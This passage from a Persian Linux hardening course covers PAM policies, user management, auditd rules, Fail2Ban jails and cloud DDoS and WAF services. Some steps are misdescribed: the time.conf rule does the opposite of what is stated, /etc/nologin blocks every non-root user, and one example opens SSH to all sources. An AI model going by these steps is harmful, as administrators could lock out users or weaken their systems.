SELinux و AppArmor دو سیستم کنترل دسترسی پیشرفته در لینوکس هستند که هر کدام مزایا و کاربردهای خاص خود را دارند. SELinux برای سیستم‌هایی که نیاز به کنترل دقیق و امنیت بالا دارند توصیه می‌شود، در حالی که AppArmor برای مدیریت ساده‌تر و انعطاف‌پذیری بیشتر مناسب است. در این بخش، نحوه پیکربندی و مدیریت هر دو ابزار هم به‌صورت گرافیکی و هم از طریق دستورات CLI ارائه شد تا بتوانید سطح امنیتی سیستم‌های خود را بهبود ببخشید.[/cdb_course_lesson][cdb_course_lesson icon=”fas fa-arrow-alt-circle-down” badge=”lecture” private_lesson=”true” title=”تنظیمات PAM (Pluggable Authentication Modules) برای احراز هویت” subtitle=”توضیحات کامل”]PAM (Pluggable Authentication Modules) یک زیرساخت ماژولار در لینوکس است که مدیریت احراز هویت را کنترل می‌کند. این سیستم به مدیران اجازه می‌دهد که سیاست‌های امنیتی مرتبط با ورود کاربران، احراز هویت چندعاملی، قفل کردن حساب‌ها، و سایر محدودیت‌های امنیتی را سفارشی‌سازی کنند. در این بخش، نحوه پیکربندی و اعمال سیاست‌های امنیتی مختلف در PAM به‌صورت گرافیکی و کامندی بررسی می‌شود.

---

ساختار و نحوه عملکرد PAM

سیستم PAM از فایل‌های پیکربندی مختلفی در مسیر /etc/pam.d/ استفاده می‌کند که هر فایل مربوط به یک سرویس خاص است. این فایل‌ها شامل ماژول‌های احراز هویت هستند که ترتیب پردازش آن‌ها بر اساس قوانین مشخصی انجام می‌شود.

بررسی ماژول‌های فعال در سیستم

برای مشاهده وضعیت فعلی PAM در لینوکس، از دستور زیر استفاده کنید:

pam-auth-update --status

برای نمایش ماژول‌های فعال در یک سرویس خاص (مثلاً sshd):

cat /etc/pam.d/sshd

---

تنظیمات اولیه PAM

فعال‌سازی احراز هویت با رمز عبور قوی

برای اطمینان از استفاده از رمزهای عبور پیچیده، می‌توان از ماژول pam_pwquality استفاده کرد. فایل مربوط به این تنظیمات در مسیر زیر قرار دارد:

sudo nano /etc/security/pwquality.conf

پارامترهای مهمی که می‌توان در این فایل تنظیم کرد:

minlen = 12          # حداقل طول رمز عبور
dcredit = -1         # حداقل یک عدد در رمز عبور الزامی است
ucredit = -1         # حداقل یک حرف بزرگ الزامی است
lcredit = -1         # حداقل یک حرف کوچک الزامی است
ocredit = -1         # حداقل یک کاراکتر خاص الزامی است

برای اعمال این سیاست در PAM، خط زیر را به فایل /etc/pam.d/common-password اضافه کنید:

sudo nano /etc/pam.d/common-password

اضافه کردن خط زیر:

password requisite pam_pwquality.so retry=3

این تنظیم باعث می‌شود که کاربران در صورت وارد کردن رمز عبور ضعیف، تا ۳ بار فرصت تغییر آن را داشته باشند.

---

فعال‌سازی قفل حساب بعد از چند بار تلاش ناموفق

برای جلوگیری از حملات Brute Force، می‌توان حساب کاربری را بعد از تعداد مشخصی تلاش ناموفق قفل کرد. این تنظیمات در ماژول pam_tally2 انجام می‌شود.

ویرایش فایل مربوطه:

sudo nano /etc/pam.d/common-auth

اضافه کردن خط زیر:

auth required pam_tally2.so deny=5 unlock_time=600

• deny=5: بعد از ۵ تلاش ناموفق، حساب قفل می‌شود.
• unlock_time=600: حساب بعد از ۱۰ دقیقه (۶۰۰ ثانیه) باز می‌شود.

برای بررسی تعداد تلاش‌های ناموفق یک کاربر:

pam_tally2 --user=username

برای بازنشانی تعداد تلاش‌های ناموفق:

pam_tally2 --user=username --reset

---

تنظیمات احراز هویت دو مرحله‌ای (2FA) با PAM

یکی از راه‌های افزایش امنیت، فعال‌سازی احراز هویت دو مرحله‌ای با استفاده از Google Authenticator است. این کار با ماژول pam_google_authenticator انجام می‌شود.

نصب و راه‌اندازی Google Authenticator

نصب بسته موردنیاز:

sudo apt install libpam-google-authenticator -y

برای هر کاربر، دستور زیر را اجرا کنید:

google-authenticator

سپس یک کد QR نمایش داده می‌شود که باید با اپلیکیشن Google Authenticator اسکن شود.

پیکربندی PAM برای احراز هویت دو مرحله‌ای

ویرایش فایل /etc/pam.d/sshd:

sudo nano /etc/pam.d/sshd

اضافه کردن خط زیر:

auth required pam_google_authenticator.so

ویرایش تنظیمات SSH برای فعال‌سازی 2FA:

sudo nano /etc/ssh/sshd_config

تنظیم مقدار زیر:

ChallengeResponseAuthentication yes

سپس سرویس SSH را ریستارت کنید:

sudo systemctl restart sshd

از این پس، هنگام ورود به سیستم با SSH، علاوه بر رمز عبور، کد تولیدشده توسط Google Authenticator نیز موردنیاز خواهد بود.

---

جلوگیری از استفاده مجدد از رمزهای عبور قدیمی

برای جلوگیری از استفاده مجدد از رمزهای عبور قبلی، می‌توان از ماژول pam_unix استفاده کرد.

ویرایش فایل مربوطه:

sudo nano /etc/pam.d/common-password

اضافه کردن خط زیر:

password sufficient pam_unix.so remember=5

این تنظیم باعث می‌شود که کاربران نتوانند پنج رمز عبور آخر خود را مجدداً انتخاب کنند.

---

اعمال محدودیت زمانی برای ورود کاربران

برای محدود کردن زمان ورود کاربران، باید فایل /etc/security/time.conf را تنظیم کرد.

ویرایش فایل:

sudo nano /etc/security/time.conf

اضافه کردن تنظیم زیر (برای مسدود کردن ورود کاربران گروه students در ساعات غیرکاری):

login;*;students;!Al0900-1700

این خط مشخص می‌کند که کاربران گروه students فقط از ۹ صبح تا ۵ بعدازظهر می‌توانند وارد سیستم شوند.

---

جمع‌بندی

در این بخش، PAM به‌عنوان یک ابزار حیاتی برای احراز هویت و امنیت بررسی شد. سیاست‌های مختلفی از جمله رمز عبور قوی، قفل حساب بعد از تلاش ناموفق، احراز هویت دو مرحله‌ای، جلوگیری از استفاده مجدد از رمزهای قدیمی و اعمال محدودیت زمانی پیکربندی شد. تمامی این تنظیمات هم به‌صورت گرافیکی و هم از طریق دستورات CLI ارائه شد تا بتوانید امنیت سیستم خود را در بالاترین سطح ممکن نگه دارید.[/cdb_course_lesson][cdb_course_lesson icon=”fas fa-arrow-alt-circle-down” badge=”lecture” private_lesson=”true” title=”مدیریت کاربران و گروه‌ها به صورت امن و رعایت بهترین شیوه‌ها” subtitle=”توضیحات کامل”]مدیریت کاربران و گروه‌ها در لینوکس یکی از مهم‌ترین جنبه‌های امنیتی برای جلوگیری از دسترسی‌های غیرمجاز و کنترل مجوزهای کاربران است. در این بخش، بهترین شیوه‌های مدیریت کاربران و گروه‌ها، همراه با دستورات CLI و پیکربندی‌های موردنیاز بررسی می‌شود.

---

ایجاد و مدیریت کاربران به‌صورت امن

ایجاد کاربر جدید با محدودیت‌های امنیتی

برای ایجاد یک کاربر جدید با یک دایرکتوری خانگی اختصاصی و تعیین پوسته مناسب، از دستور زیر استفاده کنید:

sudo useradd -m -s /bin/bash username

• -m: ایجاد دایرکتوری خانگی (/home/username)
• -s /bin/bash: تعیین پوسته (/bin/bash)

تنظیم رمز عبور قوی برای کاربر

بعد از ایجاد کاربر، رمز عبور او را تنظیم کنید:

sudo passwd username

برای اجبار کاربران به تغییر رمز عبور در اولین ورود:

sudo passwd --expire username

تعیین تاریخ انقضای رمز عبور

برای اعمال سیاست‌های امنیتی روی رمز عبور کاربر، می‌توان تاریخ انقضای آن را تعیین کرد:

sudo chage -M 90 -m 7 -W 14 username

• -M 90: رمز عبور بعد از ۹۰ روز منقضی می‌شود.
• -m 7: حداقل فاصله بین تغییر رمز عبور ۷ روز است.
• -W 14: کاربر ۱۴ روز قبل از انقضا هشدار دریافت می‌کند.

برای بررسی تنظیمات رمز عبور یک کاربر:

sudo chage -l username

---

مدیریت گروه‌ها و مجوزهای کاربران

ایجاد گروه‌های خاص و اضافه کردن کاربران

برای سازمان‌دهی بهتر، کاربران را به گروه‌های خاص اضافه کنید.

ایجاد یک گروه جدید:

sudo groupadd developers

اضافه کردن یک کاربر به گروه:

sudo usermod -aG developers username

برای مشاهده گروه‌هایی که یک کاربر عضو آن‌هاست:

groups username

یا

id username

تغییر گروه اولیه یک کاربر

اگر بخواهید گروه اصلی یک کاربر را تغییر دهید:

sudo usermod -g developers username

حذف یک کاربر از یک گروه

sudo deluser username developers

---

کنترل دسترسی کاربران به فایل‌ها و دایرکتوری‌ها

تعیین مالکیت و سطح دسترسی

تغییر مالک یک فایل یا دایرکتوری:

sudo chown username:groupname file_or_directory

تغییر سطح دسترسی (مثلاً فقط مالک اجازه نوشتن داشته باشد):

sudo chmod 750 file_or_directory

• 7: مالک خواندن، نوشتن، اجرا دارد.
• 5: گروه فقط خواندن و اجرا دارد.
• 0: دیگران هیچ دسترسی‌ای ندارند.

تنظیم مجوزهای پیش‌فرض با umask

برای اطمینان از این‌که فایل‌های جدید سطح دسترسی مناسبی دارند، مقدار umask را بررسی کنید:

umask

برای تغییر مقدار پیش‌فرض (مثلاً ۷۷۷ – ۰۲۷ = ۷۵۰):

sudo nano /etc/profile

افزودن خط زیر:

umask 027

---

مدیریت حساب‌های غیرفعال و کاربران غیرضروری

غیرفعال کردن حساب کاربری بدون حذف آن

sudo usermod --expiredate 1 username

قفل کردن حساب کاربری

sudo passwd -l username

برای باز کردن قفل:

sudo passwd -u username

حذف کاربران غیرضروری از سیستم

برای حذف کاربری و دایرکتوری خانگی او:

sudo userdel -r username

برای حذف گروهی از کاربران غیرفعال:

sudo find /home -type d -ctime +180 -exec echo "Inactive User: {}" \;

(کاربران غیرفعال در ۱۸۰ روز گذشته نمایش داده می‌شوند)

---

اعمال محدودیت‌های امنیتی برای کاربران

جلوگیری از ورود کاربران خاص

برای جلوگیری از ورود یک کاربر خاص، نام او را در فایل /etc/nologin اضافه کنید:

echo "username" | sudo tee -a /etc/nologin

محدود کردن کاربران به یک محیط خاص با chroot

برای محدود کردن دسترسی کاربران به بخشی از سیستم فایل، می‌توان از chroot jail استفاده کرد:

sudo mkdir -p /home/jail/{bin,lib}

کپی فایل‌های ضروری:

sudo cp /bin/bash /home/jail/bin/

اضافه کردن یک کاربر به محیط محدود:

sudo usermod -d /home/jail username

---

جمع‌بندی

در این بخش، مدیریت امن کاربران و گروه‌ها با رعایت بهترین شیوه‌ها بررسی شد. مواردی مانند ایجاد و مدیریت کاربران، تنظیم سیاست‌های رمز عبور، مدیریت گروه‌ها، کنترل سطح دسترسی، حذف کاربران غیرضروری و اعمال محدودیت‌های امنیتی به همراه دستورات CLI ارائه شد. با رعایت این اصول، می‌توان امنیت کاربران و دسترسی‌های آن‌ها را به‌صورت بهینه مدیریت کرد.[/cdb_course_lesson][cdb_course_lesson title=”Auditing و پیگیری فعالیت‌های کاربران”][/cdb_course_lesson][cdb_course_lesson icon=”fas fa-arrow-alt-circle-down” badge=”lecture” private_lesson=”true” title=”پیکربندی auditd برای ردیابی فعالیت‌های سیستم” subtitle=”توضیحات کامل”]auditd یک ابزار قدرتمند برای نظارت بر فعالیت‌های سیستم و ثبت رخدادهای امنیتی در لینوکس است. این سرویس برای بررسی تغییرات فایل‌ها، دسترسی‌های کاربران، تغییرات سطح دسترسی، اجرای دستورات حساس و نظارت بر رویدادهای مشکوک استفاده می‌شود. در این بخش، نحوه نصب، پیکربندی و استفاده از auditd همراه با دستورات CLI و مسیرهای فایل‌های مرتبط بررسی خواهد شد.

---

نصب و فعال‌سازی auditd

نصب auditd در سیستم

در توزیع‌های Debian/Ubuntu:

sudo apt update && sudo apt install auditd audispd-plugins -y

در توزیع‌های RHEL/CentOS:

sudo yum install audit -y

فعال‌سازی و اطمینان از اجرای سرویس

sudo systemctl enable --now auditd

بررسی وضعیت سرویس:

sudo systemctl status auditd

---

پیکربندی auditd در فایل تنظیمات

مسیر فایل تنظیمات اصلی

تمامی تنظیمات auditd در مسیر زیر قرار دارد:

/etc/audit/auditd.conf

برای ویرایش:

sudo nano /etc/audit/auditd.conf

تغییر مسیر ذخیره لاگ‌ها

به‌صورت پیش‌فرض، لاگ‌های auditd در مسیر زیر ذخیره می‌شوند:

/var/log/audit/audit.log

در صورت نیاز به تغییر مسیر ذخیره لاگ‌ها، مقدار log_file را ویرایش کنید:

log_file = /var/log/audit/custom_audit.log

تعیین حداکثر حجم لاگ‌ها و چرخش خودکار

برای جلوگیری از پر شدن فضای ذخیره‌سازی، پارامترهای زیر را تنظیم کنید:

max_log_file = 100
num_logs = 5

• max_log_file: حداکثر اندازه هر فایل لاگ (بر حسب مگابایت)
• num_logs: تعداد نسخه‌های لاگ قبل از حذف قدیمی‌ترین

---

تنظیم قوانین نظارت با auditctl

مشاهده قوانین فعال

برای بررسی قوانین نظارت فعال:

sudo auditctl -l

ثبت تغییرات فایل‌های حساس

برای ثبت تغییرات در /etc/passwd (فایل کاربران سیستم):

sudo auditctl -w /etc/passwd -p wa -k passwd_changes

• -w /etc/passwd: نظارت روی فایل
• -p wa: نظارت بر نوشتن (write) و تغییر ویژگی‌ها (attribute change)
• -k passwd_changes: اضافه کردن برچسب مشخص برای فیلتر کردن لاگ‌ها

ثبت اجرای یک دستور خاص

برای ثبت اجرای دستور su:

sudo auditctl -a always,exit -F arch=b64 -S execve -F exe=/usr/bin/su -k su_execution

نظارت بر تغییر سطح دسترسی فایل‌ها

برای ثبت تغییرات سطح دسترسی روی یک فایل یا دایرکتوری:

sudo auditctl -w /var/www/html -p rwa -k web_changes

ثبت ورود کاربران روت

برای ثبت ورود کاربران با دسترسی روت:

sudo auditctl -w /var/log/auth.log -p wa -k root_logins

---

ذخیره قوانین auditd به‌صورت دائمی

مسیر فایل پیکربندی قوانین

تمامی قوانین نظارت باید در مسیر زیر اضافه شوند:

/etc/audit/rules.d/audit.rules

برای ویرایش و اضافه کردن قوانین نظارت:

sudo nano /etc/audit/rules.d/audit.rules

اضافه کردن قوانین زیر به فایل:

# نظارت بر تغییرات فایل passwd
-w /etc/passwd -p wa -k passwd_changes

# نظارت بر اجرای دستور su
-a always,exit -F arch=b64 -S execve -F exe=/usr/bin/su -k su_execution

# نظارت بر تغییرات سطح دسترسی فایل‌های وب‌سرور
-w /var/www/html -p rwa -k web_changes

# ثبت ورودهای روت
-w /var/log/auth.log -p wa -k root_logins

پس از ذخیره فایل، سرویس auditd را مجدداً راه‌اندازی کنید:

sudo systemctl restart auditd

---

بررسی و جستجوی لاگ‌های auditd

مشاهده لاگ‌های ثبت‌شده

برای مشاهده تمام لاگ‌های ذخیره‌شده:

sudo ausearch -k passwd_changes

برای نمایش لاگ‌های مرتبط با اجرای su:

sudo ausearch -k su_execution

بررسی تغییرات یک فایل خاص

sudo aureport -f | grep /etc/passwd

نمایش لاگ‌های ورود کاربران

sudo aureport -l

مشاهده لاگ‌های مربوط به یک بازه زمانی خاص

مثلاً نمایش لاگ‌های ثبت‌شده در ۲۴ ساعت گذشته:

sudo ausearch --start today

---

جمع‌بندی

در این بخش، پیکربندی auditd برای نظارت بر فعالیت‌های سیستم مورد بررسی قرار گرفت. تنظیمات شامل نصب و فعال‌سازی، تعیین مسیر ذخیره لاگ‌ها، پیکربندی قوانین نظارت، ثبت تغییرات فایل‌های حساس، نظارت بر اجرای دستورات خاص، ثبت ورود کاربران و بررسی لاگ‌های سیستم بود. با اجرای این تنظیمات، می‌توان نظارت دقیقی بر فعالیت‌های مشکوک و تغییرات امنیتی داشت.[/cdb_course_lesson][cdb_course_lesson icon=”fas fa-arrow-alt-circle-down” badge=”lecture” private_lesson=”true” title=”استفاده از ابزارهایی مانند auditctl و ausearch برای بررسی و تحلیل رویدادها” subtitle=”توضیحات کامل”]در سیستم‌عامل‌های لینوکسی، برای نظارت و بررسی رویدادهای امنیتی و تغییرات در سیستم، ابزارهایی مانند auditctl و ausearch بسیار مفید هستند. این ابزارها بخشی از بسته‌ی auditd هستند که به منظور ضبط و مدیریت رویدادهای سیستم مورد استفاده قرار می‌گیرند. در این قسمت، به بررسی این ابزارها و نحوه استفاده از آن‌ها خواهیم پرداخت.

1. نصب و راه‌اندازی auditd

قبل از استفاده از ابزارهای auditctl و ausearch، باید سرویس auditd را نصب و راه‌اندازی کنید. برای نصب این ابزارها، می‌توانید از دستورات زیر استفاده کنید:

نصب auditd

برای نصب ابزارهای مورد نیاز از جمله auditd در سیستم‌های مبتنی بر دیستروهای مختلف لینوکس، از دستور زیر استفاده کنید:

sudo apt-get install auditd audispd-plugins

برای سیستم‌های مبتنی بر RHEL/CentOS:

sudo yum install audit

پس از نصب، سرویس auditd را با دستور زیر راه‌اندازی کنید:

sudo systemctl start auditd
sudo systemctl enable auditd

2. استفاده از auditctl برای پیکربندی قوانین

ابزار auditctl برای پیکربندی و مدیریت قوانین مربوط به نظارت بر رویدادها در سیستم استفاده می‌شود. با استفاده از این ابزار می‌توانید تصمیم بگیرید که کدام رویدادها و فعالیت‌ها باید ثبت شوند.

مثال 1: ثبت ورود کاربران

برای ثبت تمام تلاش‌های ورود به سیستم، می‌توانید یک قانون ساده اضافه کنید:

sudo auditctl -w /var/log/auth.log -p wa -k login-events

در این دستور:

• -w /var/log/auth.log مسیر فایل لاگ را مشخص می‌کند.
• -p wa به این معنی است که هرگونه نوشتن و دسترسی به فایل باید ثبت شود.
• -k login-events یک کلید شناسایی به این قانون اختصاص می‌دهد که برای جستجو در گزارش‌ها مفید است.

مثال 2: نظارت بر اجرای دستورات خاص

اگر می‌خواهید نظارت بر اجرای دستورات خاصی مانند chmod یا chown داشته باشید، می‌توانید از دستور زیر استفاده کنید:

sudo auditctl -a always,exit -F arch=b64 -S chmod -S chown -k permission-changes

این دستور هر بار که دستوری مانند chmod یا chown اجرا شود، ثبت خواهد شد.

3. استفاده از ausearch برای جستجو و تحلیل رویدادها

پس از تعریف قوانین و ثبت رویدادها، می‌توانید از ابزار ausearch برای جستجو و تحلیل رویدادهای ثبت‌شده استفاده کنید.

مثال 1: جستجو برای رویدادهای خاص با کلید مشخص

برای جستجوی رویدادهای ثبت‌شده با یک کلید خاص (در اینجا login-events):

sudo ausearch -k login-events

این دستور تمامی رویدادهایی که با کلید login-events ثبت شده‌اند را نمایش می‌دهد.

مثال 2: جستجو برای فعالیت‌های خاص در یک بازه زمانی مشخص

برای جستجو بر اساس بازه زمانی، می‌توانید از دستور زیر استفاده کنید:

sudo ausearch -ts today -te now

این دستور رویدادهایی را که امروز ثبت شده‌اند، نمایش می‌دهد.

مثال 3: تحلیل جزئیات یک رویداد خاص

اگر می‌خواهید جزئیات بیشتری از یک رویداد خاص را مشاهده کنید، می‌توانید از دستور زیر استفاده کنید:

sudo ausearch -i -m EXECVE

این دستور جزئیات مربوط به فراخوانی دستورها را نمایش می‌دهد.

4. پیکربندی فایل‌های log

تمامی رویدادهای سیستم در فایل‌های لاگ مربوطه ذخیره می‌شوند که می‌توانند در مسیرهای مختلفی قرار داشته باشند. به‌طور پیش‌فرض، این لاگ‌ها در مسیر /var/log/audit/audit.log قرار دارند. برای تنظیمات بیشتر، می‌توانید فایل پیکربندی auditd را ویرایش کنید:

مسیر فایل پیکربندی:

/etc/audit/auditd.conf

در این فایل می‌توانید تنظیماتی مانند محل ذخیره لاگ‌ها و حجم فایل‌های لاگ را تغییر دهید.

مثال: تغییر مکان ذخیره‌سازی لاگ‌ها

برای تغییر مسیر ذخیره‌سازی لاگ‌ها، می‌توانید مقدار log_file را در فایل پیکربندی auditd.conf تغییر دهید:

log_file = /var/log/new_audit.log

سپس سرویس auditd را ریستارت کنید تا تغییرات اعمال شوند:

sudo systemctl restart auditd

جمع‌بندی

استفاده از ابزارهای auditctl و ausearch به مدیران سیستم این امکان را می‌دهد که به‌طور دقیق رویدادها و فعالیت‌های سیستم را نظارت کنند. با پیکربندی صحیح قوانین با استفاده از auditctl و تحلیل این رویدادها با استفاده از ausearch، می‌توان امنیت سیستم را بهبود بخشید و تهدیدات احتمالی را شناسایی کرد. این ابزارها در کنار دیگر ابزارهای امنیتی می‌توانند به شناسایی و جلوگیری از حملات و فعالیت‌های مخرب کمک کنند.[/cdb_course_lesson][cdb_course_lesson title=”فصل 6. مقابله با حملات”][/cdb_course_lesson][cdb_course_lesson title=”شناسایی و مقابله با حملات Brute Force”][/cdb_course_lesson][cdb_course_lesson icon=”fas fa-arrow-alt-circle-down” badge=”lecture” private_lesson=”true” title=”پیکربندی Fail2Ban برای جلوگیری از حملات Brute Force به سرویس‌ها” subtitle=”توضیحات کامل”]Fail2Ban یک ابزار امنیتی است که برای شناسایی و مسدود کردن خودکار آدرس‌های IP که تلاش‌های ناموفق متعددی برای ورود دارند، استفاده می‌شود. این ابزار از فایل‌های لاگ برای شناسایی حملات Brute Force و سایر فعالیت‌های مخرب استفاده کرده و IP‌های مشکوک را در فایروال مسدود می‌کند.

در این بخش، مراحل نصب، پیکربندی و تنظیم قوانین Fail2Ban برای محافظت از سرویس‌های مهمی مانند SSH، Apache و Postfix ارائه می‌شود.

---

نصب Fail2Ban در سیستم

نصب روی Debian و Ubuntu

sudo apt update
sudo apt install fail2ban -y

نصب روی CentOS و RHEL

sudo yum install epel-release -y
sudo yum install fail2ban -y

نصب روی Arch Linux

sudo pacman -S fail2ban

---

فعال‌سازی و بررسی وضعیت Fail2Ban

فعال‌سازی سرویس

sudo systemctl enable --now fail2ban

بررسی وضعیت سرویس

sudo systemctl status fail2ban

---

پیکربندی Fail2Ban

مسیر فایل‌های پیکربندی

• تنظیمات اصلی:

  /etc/fail2ban/jail.conf
  

• فایل پیکربندی اختصاصی (برای جلوگیری از تغییرات در بروزرسانی‌ها):

  /etc/fail2ban/jail.local
  

• قوانین بررسی لاگ‌ها (Filters):

  /etc/fail2ban/filter.d/
  

ایجاد فایل jail.local برای تنظیمات سفارشی

برای جلوگیری از تغییرات بروزرسانی‌ها، تنظیمات باید در فایل jail.local انجام شود.

sudo cp /etc/fail2ban/jail.conf /etc/fail2ban/jail.local
sudo nano /etc/fail2ban/jail.local

در این فایل، تنظیمات زیر را اعمال کنید:

[DEFAULT]
# مدت زمان مسدود شدن (در ثانیه)
bantime = 3600 

# تعداد تلاش‌های ناموفق قبل از مسدود شدن
maxretry = 5 

# مدت زمانی که لاگ‌های قدیمی بررسی می‌شوند (در ثانیه)
findtime = 600 

# مسدود کردن با استفاده از iptables
banaction = iptables-multiport 

---

تنظیم Fail2Ban برای SSH

برای جلوگیری از حملات Brute Force به SSH، در فایل jail.local، بخش [sshd] را فعال کنید:

[sshd]
enabled = true
port = 22
filter = sshd
logpath = /var/log/auth.log
maxretry = 5
bantime = 3600

در سیستم‌های RHEL و CentOS مسیر لاگ SSH متفاوت است و باید مقدار زیر تنظیم شود:

logpath = /var/log/secure

اعمال تنظیمات

sudo systemctl restart fail2ban

بررسی وضعیت Fail2Ban برای SSH

sudo fail2ban-client status sshd

---

تنظیم Fail2Ban برای Apache

برای جلوگیری از حملات Brute Force به Apache (مثلاً تلاش برای ورود به پنل مدیریت وردپرس یا دسترسی‌های غیرمجاز)، تنظیمات زیر را در jail.local اضافه کنید:

[apache-auth]
enabled = true
port = http,https
filter = apache-auth
logpath = /var/log/apache2/error.log
maxretry = 5
bantime = 1800

بررسی قوانین مربوط به Apache

sudo fail2ban-client status apache-auth

---

تنظیم Fail2Ban برای Postfix (محافظت از سرور ایمیل)

اگر Postfix به‌عنوان سرور ایمیل در حال اجرا باشد، Fail2Ban می‌تواند از آن در برابر حملات محافظت کند.

تنظیمات زیر را در jail.local اضافه کنید:

[postfix]
enabled = true
port = smtp,submission,465
filter = postfix
logpath = /var/log/mail.log
maxretry = 5
bantime = 3600

بررسی قوانین مربوط به Postfix

sudo fail2ban-client status postfix

---

مشاهده و مدیریت IP‌های مسدود‌شده

نمایش تمامی قوانین فعال

sudo fail2ban-client status

مشاهده IP‌های مسدود‌شده برای SSH

sudo fail2ban-client status sshd

رفع مسدودیت یک IP خاص

sudo fail2ban-client set sshd unbanip 192.168.1.100

مسدود کردن دستی یک IP

sudo fail2ban-client set sshd banip 192.168.1.200

---

ثبت لاگ‌های Fail2Ban

تمامی فعالیت‌های Fail2Ban در فایل زیر ثبت می‌شود:

/var/log/fail2ban.log

برای مشاهده لاگ‌های جدید:

sudo tail -f /var/log/fail2ban.log

---

جمع‌بندی

در این بخش، نحوه نصب، پیکربندی و مدیریت Fail2Ban برای محافظت از SSH، Apache و Postfix بررسی شد. Fail2Ban ابزار قدرتمندی برای جلوگیری از حملات Brute Force و محافظت از سرورهای لینوکسی است. با استفاده از این راهکار، می‌توان امنیت سرویس‌های حساس را افزایش داد و دسترسی‌های مخرب را به‌صورت خودکار مسدود کرد.[/cdb_course_lesson][cdb_course_lesson icon=”fas fa-arrow-alt-circle-down” badge=”lecture” private_lesson=”true” title=”استفاده از خدمات Cloud-based برای Mitigation حملات” subtitle=”توضیحات کامل”]با گسترش روزافزون تهدیدات سایبری، بسیاری از شرکت‌ها و سازمان‌ها به سمت استفاده از خدمات ابری (Cloud-based services) برای کاهش خطرات و مقابله با حملات سایبری حرکت کرده‌اند. این خدمات شامل تکنیک‌ها و ابزارهایی هستند که به کمک آنها می‌توان انواع مختلف حملات از جمله حملات DDoS، تزریق SQL، و حملات نفوذی را شناسایی و متوقف کرد. در این قسمت به بررسی خدمات ابری و چگونگی استفاده از آنها برای مقابله با حملات خواهیم پرداخت.

1. استفاده از AWS Shield برای مقابله با حملات DDoS

AWS Shield یک سرویس مدیریت شده در آمازون وب سرویس است که برای محافظت از منابع شما در برابر حملات DDoS طراحی شده است. AWS Shield در دو سطح ارائه می‌شود:

• AWS Shield Standard: به صورت خودکار و بدون هزینه اضافی برای محافظت از سرویس‌هایی مانند EC2، ELB، و CloudFront فعال است.
• AWS Shield Advanced: این سطح علاوه بر امکانات سطح استاندارد، محافظت پیشرفته‌تری برای حملات پیچیده‌تر و خدمات 24/7 ارائه می‌دهد.

1.1. فعال‌سازی AWS Shield Advanced

برای فعال‌سازی AWS Shield Advanced، باید ابتدا وارد کنسول AWS شوید و مراحل زیر را دنبال کنید:

1. وارد کنسول مدیریت AWS شوید.
2. به قسمت AWS Shield بروید.
3. بر روی Advanced کلیک کنید.
4. برای تکمیل فرایند، مراحل راه‌اندازی را دنبال کنید.

1.2. استفاده از AWS WAF در کنار AWS Shield

برای محافظت بیشتر در برابر حملات، می‌توان از AWS WAF (Web Application Firewall) در کنار AWS Shield استفاده کرد. AWS WAF به شما این امکان را می‌دهد که درخواست‌های HTTP/S را بر اساس قوانین مختلف فیلتر کنید.

برای راه‌اندازی AWS WAF از کنسول AWS:

1. وارد کنسول WAF شوید.
2. یک Web ACL جدید بسازید.
3. قوانین فیلترینگ مورد نظر را اضافه کنید.
4. Web ACL را به منابع خود مانند CloudFront، ALB یا API Gateway متصل کنید.

در صورت نیاز به پیکربندی AWS WAF از دستور زیر در AWS CLI نیز می‌توانید استفاده کنید:

aws wafv2 create-web-acl \
    --name "MyWebACL" \
    --scope "CLOUDFRONT" \
    --default-action Allow={} \
    --rules '[
        {
            "Name": "BlockSQLInjection",
            "Priority": 1,
            "Action": {"Block": {}},
            "Statement": {
                "SqliMatchStatement": {
                    "FieldToMatch": {"Body": {}},
                    "TextTransformations": [{"Priority": 0, "Type": "NONE"}]
                }
            }
        }
    ]' \
    --region us-east-1

این دستور یک Web ACL ایجاد می‌کند که از حملات SQL Injection جلوگیری می‌کند.

2. استفاده از Google Cloud Armor برای مقابله با حملات

Google Cloud Armor سرویس امنیتی ابری است که به‌طور خاص برای حفاظت از برنامه‌های وب در برابر حملات DDoS و سایر تهدیدات طراحی شده است. این سرویس از فایروال‌های مبتنی بر قوانین و شبیه‌سازی حملات استفاده می‌کند تا امنیت منابع را تضمین کند.

2.1. پیکربندی Google Cloud Armor

برای پیکربندی Google Cloud Armor، ابتدا باید وارد کنسول Google Cloud شوید و سپس مراحل زیر را انجام دهید:

1. وارد کنسول Google Cloud شوید.
2. به قسمت Security و سپس Cloud Armor بروید.
3. یک Security Policy جدید بسازید.
4. قوانین امنیتی مختلف را طبق نیاز خود تنظیم کنید.

برای ایجاد یک Security Policy از طریق Google Cloud CLI، می‌توانید دستور زیر را وارد کنید:

gcloud compute security-policies create my-policy --description "Security policy for my app"

پس از ایجاد سیاست امنیتی، باید آن را به منابع خود مانند Load Balancer متصل کنید:

gcloud compute backend-services update my-backend-service \
    --security-policy my-policy \
    --global

این دستور امنیتی را به سرویس بارگذاری (Load Balancer) شما اعمال می‌کند.

3. استفاده از Azure DDoS Protection برای محافظت در برابر حملات

Azure DDoS Protection یکی دیگر از سرویس‌های ابری است که برای مقابله با حملات DDoS در محیط‌های ابری مایکروسافت Azure طراحی شده است. Azure DDoS Protection در دو سطح ارائه می‌شود:

• Standard: محافظت پیشرفته‌تری برای منابع خاص فراهم می‌کند.
• Basic: به صورت پیش‌فرض برای همه منابع فعال است.

3.1. فعال‌سازی Azure DDoS Protection

برای فعال‌سازی Azure DDoS Protection Standard، مراحل زیر را دنبال کنید:

1. وارد Azure Portal شوید.
2. به بخش DDoS Protection بروید.
3. یک Protection Plan جدید بسازید.
4. منابع خود را به این Protection Plan متصل کنید.

3.2. پیکربندی Azure Network Security Group (NSG)

در کنار Azure DDoS Protection، برای مدیریت دسترسی به شبکه‌ها، می‌توانید از Network Security Group (NSG) استفاده کنید. برای این کار از دستور زیر استفاده کنید:

az network nsg rule create \
    --resource-group MyResourceGroup \
    --nsg-name MyNetworkSecurityGroup \
    --name AllowSSH \
    --protocol tcp \
    --direction inbound \
    --priority 100 \
    --source-address-prefixes "*" \
    --destination-port-ranges 22 \
    --access allow

این دستور یک قانون برای مجاز کردن دسترسی به پورت SSH بر روی NSG ایجاد می‌کند.

جمع‌بندی

